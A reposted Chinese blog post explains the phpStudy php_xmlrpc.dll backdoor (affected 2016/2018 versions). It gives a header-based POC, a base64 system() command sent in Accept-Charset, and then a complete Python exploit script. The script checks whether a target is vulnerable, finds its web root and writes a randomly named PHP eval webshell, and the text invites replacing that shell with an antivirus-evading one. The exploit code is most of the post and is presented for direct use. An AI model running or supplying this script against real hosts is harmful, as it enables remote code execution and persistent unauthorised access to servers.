ICode9
精准搜索请尝试: 精确搜索
首页
编程语言>
数据库
系统相关
互联网
其他分享
Python
Java
JavaScript
android
PHP
首页 > 编程语言> 文章详细

phpstudy后门POC分析和EXP开发

2022-01-24 22:00:45  阅读:292  来源: 互联网

标签:head exp url Accept phpstudy EXP php POC string


POC

2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的php_xmlrpc.dll模块被植入隐藏后门,可以正向执行任意php代码。

影响版本

  • phpStudy2016-php-5.2.17
  • phpStudy2016-php-5.4.45
  • phpStudy2018-php-5.2.17
  • phpStudy2018-php-5.4.45

后门存在于*\ext\php_xmlrpc.dll,用记事本打开搜索eval,如下图所示则又可能存在后门

抓包,添加Accept-charset,后面对rce进行base64加密

Accept-charset: c3lzdGVtKCJ3aG9hbWkiKTs=

注意修改Accept-Encoding: gzip,deflate,deflate前的空格需要删除

EXP

很自然的就能写出相应exp(github)

import base64
import random
import requests
import string
head={
    'Accept-Encoding':'gzip,deflate',
    'Accept-Charset':'c3lzdGVtKCJlY2hvIGhhaGExMjMiKTs=' # echo haha123
}

def get_standard_url(url):
    if url[:7] != "http://" or url[:8] != "https://":
        url = "http://"+url
        return url
    else:
        return False

def exp():
    head["Accept-Charset"] = "c3lzdGVtKCJjaGRpciIpOw==" # system("chdir")
    res1 = requests.get(url=url,headers=head,timeout=5,allow_redirects=False)
    path = str(res1.text.split("\n",1)[0]).strip()

    shell_name = ''.join(random.sample(string.ascii_letters+string.digits,8))
    key = ''.join(random.sample(string.ascii_letters+string.digits,4))

    exp = f"fputs(fopen('{path}\PHPTutorial\WWW\{shell_name}.php','w'),'<?php @eval($_POST[{key}]); ?>');"
    exp_encode = str(base64.b64encode(exp.encode('utf-8'))).split("'",2)[1]
    head['Accept-Charset'] = exp_encode
    requests.get(url=url, headers=head, timeout=5, allow_redirects=False)

    return f"[!] Shell_name={shell_name}.php, Key={key}"

if __name__=="__main__":
    url = input("[+] Target: ")
    url = get_standard_url(url)
    try:
        res = requests.get(url=url, headers=head, timeout=5, allow_redirects=False)
        if res.status_code == 200 and res.text[:7] == "haha123":
            print("[*] POC EXISTS.")
            print(exp())
        else:
            print("[-] POC NOT EXISTS.")
    except:
        print("[!] ERROR!\n")

注意,这里没有对shell做免杀,可把自己收藏的shell做外部导入替换

标签:head,exp,url,Accept,phpstudy,EXP,php,POC,string
来源: https://blog.csdn.net/qq_35664104/article/details/122675903

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

关于我们 | 联系我们 | 留言反馈

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有